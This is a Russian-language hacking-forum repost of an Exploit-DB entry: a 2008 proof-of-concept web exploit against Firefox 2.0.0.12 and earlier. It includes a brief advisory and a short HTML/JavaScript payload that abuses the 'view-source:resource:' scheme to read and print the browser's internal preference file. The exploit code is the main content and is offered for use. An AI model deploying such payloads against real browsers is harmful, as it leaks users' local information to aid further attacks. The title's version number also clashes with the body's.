Exploit Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31127
Проверка EDB
  1. Пройдено
Автор
RONALD VAN DEN HEETKAMP
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
N/A
Дата публикации
2008-02-08
Код:
source: https://www.securityfocus.com/bid/27700/info

Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources.

Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks.

Firefox 2.0.0.12 and prior versions are vulnerable.

<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script>
 
Источник
www.exploit-db.com

Похожие темы